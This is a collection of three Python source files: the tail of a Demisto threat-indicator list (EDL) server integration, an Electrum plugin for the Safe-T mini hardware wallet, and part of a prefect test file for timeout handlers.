"""Collapse ip groups list to ranges.
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of Ranges.
"""
ip_ranges = [] # type:List
for group in ip_range_groups:
# handle single ips
if len(group) == 1:
ip_ranges.append(str(group[0]))
continue
ip_ranges.append(str(group))
return ip_ranges
def ips_to_ranges(ips: list, collapse_ips: str):
"""Collapse IPs to Ranges or CIDRs.
Args:
ips (list): a list of IP strings.
collapse_ips (str): Whether to collapse to Ranges or CIDRs.
Returns:
list. a list to Ranges or CIDRs.
"""
if collapse_ips == COLLAPSE_TO_RANGES:
ips_range_groups = IPSet(ips).iter_ipranges()
return ip_groups_to_ranges(ips_range_groups)
else:
cidrs = IPSet(ips).iter_cidrs()
return ip_groups_to_cidrs(cidrs)
def create_values_for_returned_dict(iocs: list, request_args: RequestArguments) -> Tuple[dict, int]:
"""
Create a dictionary for output values
"""
formatted_indicators = []
ipv4_formatted_indicators = []
ipv6_formatted_indicators = []
for ioc in iocs:
indicator = ioc.get('value')
if not indicator:
continue
ioc_type = ioc.get('indicator_type')
# protocol stripping
indicator = _PROTOCOL_REMOVAL.sub('', indicator)
# Port stripping
indicator_with_port = indicator
# remove port from indicator - from demisto.com:369/rest/of/path -> demisto.com/rest/of/path
indicator = _PORT_REMOVAL.sub(_URL_WITHOUT_PORT, indicator)
# check if removing the port changed something about the indicator
if indicator != indicator_with_port and not request_args.url_port_stripping:
# if port was in the indicator and url_port_stripping param not set - ignore the indicator
continue
# Reformatting to to PAN-OS URL format
with_invalid_tokens_indicator = indicator
# mix of text and wildcard in domain field handling
indicator = _INVALID_TOKEN_REMOVAL.sub('*', indicator)
# check if the indicator held invalid tokens
if with_invalid_tokens_indicator != indicator:
# invalid tokens in indicator- if drop_invalids is set - ignore the indicator
if request_args.drop_invalids:
continue
# for PAN-OS *.domain.com does not match domain.com
# we should provide both
# this could generate more than num entries according to PAGE_SIZE
if indicator.startswith('*.'):
formatted_indicators.append(indicator.lstrip('*.'))
if request_args.collapse_ips != DONT_COLLAPSE and ioc_type == 'IP':
ipv4_formatted_indicators.append(IPAddress(indicator))
elif request_args.collapse_ips != DONT_COLLAPSE and ioc_type == 'IPv6':
ipv6_formatted_indicators.append(IPAddress(indicator))
else:
formatted_indicators.append(indicator)
if len(ipv4_formatted_indicators) > 0:
ipv4_formatted_indicators = ips_to_ranges(ipv4_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv4_formatted_indicators)
if len(ipv6_formatted_indicators) > 0:
ipv6_formatted_indicators = ips_to_ranges(ipv6_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv6_formatted_indicators)
return {EDL_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
def get_edl_ioc_values(on_demand: bool,
request_args: RequestArguments,
integration_context: dict,
cache_refresh_rate: str = None) -> str:
"""
Get the ioc list to return in the edl
Args:
on_demand: Whether on demand configuration is set to True or not
request_args: the request arguments
integration_context: The integration context
cache_refresh_rate: The cache_refresh_rate configuration value
Returns:
string representation of the iocs
"""
last_run = integration_context.get('last_run')
last_query = integration_context.get('last_query')
current_iocs = integration_context.get('current_iocs')
# on_demand ignores cache
if on_demand:
if request_args.is_request_change(integration_context):
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args,
iocs=current_iocs)
else:
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args)
else:
if last_run:
cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
if last_run <= cache_time or request_args.is_request_change(integration_context) or \
request_args.query != last_query:
values_str = refresh_edl_context(request_args)
else:
values_str = get_ioc_values_str_from_context(integration_context, request_args=request_args)
else:
values_str = refresh_edl_context(request_args)
return values_str
def get_ioc_values_str_from_context(integration_context: dict,
request_args: RequestArguments,
iocs: list = None) -> str:
"""
Extracts output values from cache
Args:
integration_context: The integration context
request_args: The request args
iocs: The current raw iocs data saved in the integration context
Returns:
string representation of the iocs
"""
if iocs:
if request_args.offset > len(iocs):
return ''
iocs = iocs[request_args.offset: request_args.limit + request_args.offset]
returned_dict, _ = create_values_for_returned_dict(iocs, request_args=request_args)
integration_context['last_output'] = returned_dict
set_integration_context(integration_context)
else:
returned_dict = integration_context.get('last_output', {})
return returned_dict.get(EDL_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
"""
Checks whether the authentication is valid.
:param headers: The headers of the http request
:param username: The integration's username
:param password: The integration's password
:return: Boolean which indicates whether the authentication is valid or not
"""
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return False
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return False
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return False
user, pwd = credentials_list
return user == username and pwd == password
''' ROUTE FUNCTIONS '''
@APP.route('/', methods=['GET'])
def route_edl_values() -> Response:
"""
Main handler for values saved in the integration context
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if username and password:
headers: dict = cast(Dict[Any, Any], request.headers)
if not validate_basic_authentication(headers, username, password):
err_msg: str = 'Basic authentication failed. Make sure you are using the right credentials.'
demisto.debug(err_msg)
return Response(err_msg, status=401)
request_args = get_request_args(request.args, params)
values = get_edl_ioc_values(
on_demand=params.get('on_demand'),
request_args=request_args,
integration_context=get_integration_context(),
cache_refresh_rate=params.get('cache_refresh_rate'),
)
return Response(values, status=200, mimetype='text/plain')
def get_request_args(request_args: dict, params: dict) -> RequestArguments:
"""
Processing a flask request arguments and generates a RequestArguments instance from it.
Args:
request_args: Flask request arguments
params: Integration configuration parameters
Returns:
RequestArguments instance with processed arguments
"""
limit = try_parse_integer(request_args.get('n', params.get('edl_size', 10000)), EDL_LIMIT_ERR_MSG)
offset = try_parse_integer(request_args.get('s', 0), EDL_OFFSET_ERR_MSG)
query = request_args.get('q', params.get('indicators_query'))
strip_port = request_args.get('sp', params.get('url_port_stripping', False))
drop_invalids = request_args.get('di', params.get('drop_invalids', False))
collapse_ips = request_args.get('tr', params.get('collapse_ips', DONT_COLLAPSE))
# handle flags
if drop_invalids == '':
drop_invalids = True
if strip_port == '':
strip_port = True
if collapse_ips not in [DONT_COLLAPSE, COLLAPSE_TO_CIDR, COLLAPSE_TO_RANGES]:
collapse_ips = try_parse_integer(collapse_ips, EDL_COLLAPSE_ERR_MSG)
if collapse_ips not in [0, 1, 2]:
raise DemistoException(EDL_COLLAPSE_ERR_MSG)
collapse_options = {
0: DONT_COLLAPSE,
1: COLLAPSE_TO_RANGES,
2: COLLAPSE_TO_CIDR
}
collapse_ips = collapse_options[collapse_ips]
return RequestArguments(query, limit, offset, strip_port, drop_invalids, collapse_ips)
''' COMMAND FUNCTIONS '''
def test_module(_: Dict, params: Dict):
"""
Validates:
1. Valid port.
2. Valid cache_refresh_rate
"""
get_params_port(params)
on_demand = params.get('on_demand', None)
if not on_demand:
try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG) # validate EDL Size was set
query = params.get('indicators_query') # validate indicators_query isn't empty
if not query:
raise ValueError('"Indicator Query" is required. Provide a valid query.')
cache_refresh_rate = params.get('cache_refresh_rate', '')
if not cache_refresh_rate:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
# validate cache_refresh_rate value
range_split = cache_refresh_rate.split(' ')
if len(range_split) != 2:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
if not range_split[1] in ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'month', 'months', 'year',
'years']:
raise ValueError(
'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
parse_date_range(cache_refresh_rate, to_timestamp=True)
run_long_running(params, is_test=True)
return 'ok', {}, {}
def run_long_running(params: Dict, is_test: bool = False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
certificate_path = str()
private_key_path = str()
try:
port = get_params_port(params)
ssl_args = dict()
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
demisto.error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def update_edl_command(args: Dict, params: Dict):
"""
Updates the EDL values and format on demand
"""
on_demand = params.get('on_demand')
if not on_demand:
raise DemistoException(
'"Update EDL On Demand" is off. If you want to update the EDL manually please toggle it on.')
limit = try_parse_integer(args.get('edl_size', params.get('edl_size')), EDL_LIMIT_ERR_MSG)
print_indicators = args.get('print_indicators')
query = args.get('query', '')
collapse_ips = args.get('collapse_ips', DONT_COLLAPSE)
url_port_stripping = args.get('url_port_stripping', '').lower() == 'true'
drop_invalids = args.get('drop_invalids', '').lower() == 'true'
offset = try_parse_integer(args.get('offset', 0), EDL_OFFSET_ERR_MSG)
request_args = RequestArguments(query, limit, offset, url_port_stripping, drop_invalids, collapse_ips)
indicators = refresh_edl_context(request_args)
hr = tableToMarkdown('EDL was updated successfully with the following values', indicators,
['Indicators']) if print_indicators == 'true' else 'EDL was updated successfully'
return hr, {}, indicators
def main():
"""
Main
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if (username and not password) or (password and not username):
err_msg: str = 'If using credentials, both username and password should be provided.'
demisto.debug(err_msg)
raise DemistoException(err_msg)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
commands = {
'test-module': test_module,
'edl-update': update_edl_command,
}
try:
if command == 'long-running-execution':
run_long_running(params)
elif command in commands:
readable_output, outputs, raw_response = commands[command](demisto.args(), params)
return_outputs(readable_output, outputs, raw_response)
else:
raise NotImplementedError(f'Command "{command}" is not implemented.')
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Sapphire"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_executors.py
|
import os
import multiprocessing
import sys
import threading
import time
import pytest
import prefect
from prefect.utilities.exceptions import TaskTimeoutError
from prefect.utilities.executors import (
run_with_thread_timeout,
run_with_multiprocess_timeout,
tail_recursive,
RecursiveCall,
)
# We will test the low-level timeout handlers here and `run_task_with_timeout`
# is covered in `tests.core.test_flow.test_timeout_actually_stops_execution`
# and `tests.engine.test_task_runner.test_timeout_actually_stops_execution`
TIMEOUT_HANDLERS = [run_with_thread_timeout, run_with_multiprocess_timeout]
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_times_out(timeout_handler):
slow_fn = lambda: time.sleep(2)
with pytest.raises(TaskTimeoutError):
timeout_handler(slow_fn, timeout=1)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_actually_stops_execution(timeout_handler, tmpdir):
start_path = str(tmpdir.join("started.txt"))
finish_path = str(tmpdir.join("finished.txt"))
if timeout_handler == run_with_thread_timeout:
timeout = 1
wait_time = 1.5
max_overhead = 0.1
else:
timeout = 2.5
wait_time = 3
max_overhead = 2
def slow_fn(start_path, finish_path, wait_time):
with open(start_path, "wb"):
pass
time.sleep(wait_time)
with open(start_path, "wb"):
pass
start_time = time.time()
stop_time = start_time + wait_time + max_overhead
with pytest.raises(TaskTimeoutError):
timeout_handler(
slow_fn, args=(start_path, finish_path, wait_time), timeout=timeout
)
# Wait untl after we're sure the task would have finished naturally
time.sleep(stop_time - time.time())
assert os.path.exists(start_path)
assert not os.path.exists(finish_path)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_passes_args_and_kwargs_and_returns(timeout_handler):
def just_return(x, y=None):
return x, y
assert timeout_handler(
just_return, args=[5], kwargs=dict(y="yellow"), timeout=10
) == (
5,
"yellow",
)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_doesnt_swallow_bad_args(timeout_handler):
def do_nothing(x, y=None):
return x, y
with pytest.raises(TypeError):
timeout_handler(do_nothing, timeout=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, args=[5], kwargs=dict(z=10), timeout=10)
with pytest.raises(TypeError):
timeout_handler(do_nothing, args=[5], kwargs=dict(y="s", z=10), timeout=10)
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_reraises(timeout_handler):
def do_something():
raise ValueError("test")
with pytest.raises(ValueError, match="test"):
timeout_handler(do_something, timeout=10)
# Define a top-level helper function for a null-op process target, must be defined
# as a non-local for the python native pickler used within `my_process`
def do_nothing():
return None
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_allows_function_to_spawn_new_process(timeout_handler):
def my_process():
p = multiprocessing.Process(target=do_nothing())
p.start()
p.join()
p.terminate()
return "hello"
assert timeout_handler(my_process, timeout=10) == "hello"
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_allows_function_to_spawn_new_thread(timeout_handler):
def my_thread():
t = threading.Thread(target=lambda: 5)
t.start()
t.join()
return "hello"
assert timeout_handler(my_thread, timeout=10) == "hello"
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_doesnt_do_anything_if_no_timeout(timeout_handler):
assert timeout_handler(lambda: 4) == 4
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
@pytest.mark.parametrize("timeout_handler", TIMEOUT_HANDLERS)
def test_timeout_handler_preserves_context(timeout_handler):
def my_fun(x, **kwargs):
return prefect.context.get("test_key")
with prefect.context(test_key=42):
res = timeout_handler(my_fun, args=[2], timeout=10)
assert res == 42
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_run_with_thread_timeout_preserves_logging(caplog):
run_with_thread_timeout(prefect.Flow("logs").run, timeout=10)
assert len(caplog.messages) >= 2 # 1 INFO to start, 1 INFO to end
@pytest.mark.skipif(
sys.platform == "win32", reason="Windows doesn't support any timeout logic"
)
def test_run_with_multiprocess_timeout_preserves_logging(capfd):
"""
Requires fd capturing because the subprocess output won't be captured by caplog
"""
run_with_multiprocess_timeout(prefect.Flow("logs").run, timeout=10)
stdout = capfd.readouterr().out
assert "Beginning Flow run" in stdout
assert "Flow run SUCCESS" in stdout
def test_recursion_go_case():
@tail_recursive
def my_func(a=0):
if a > 5:
return a
raise RecursiveCall(my_func, a + 2)
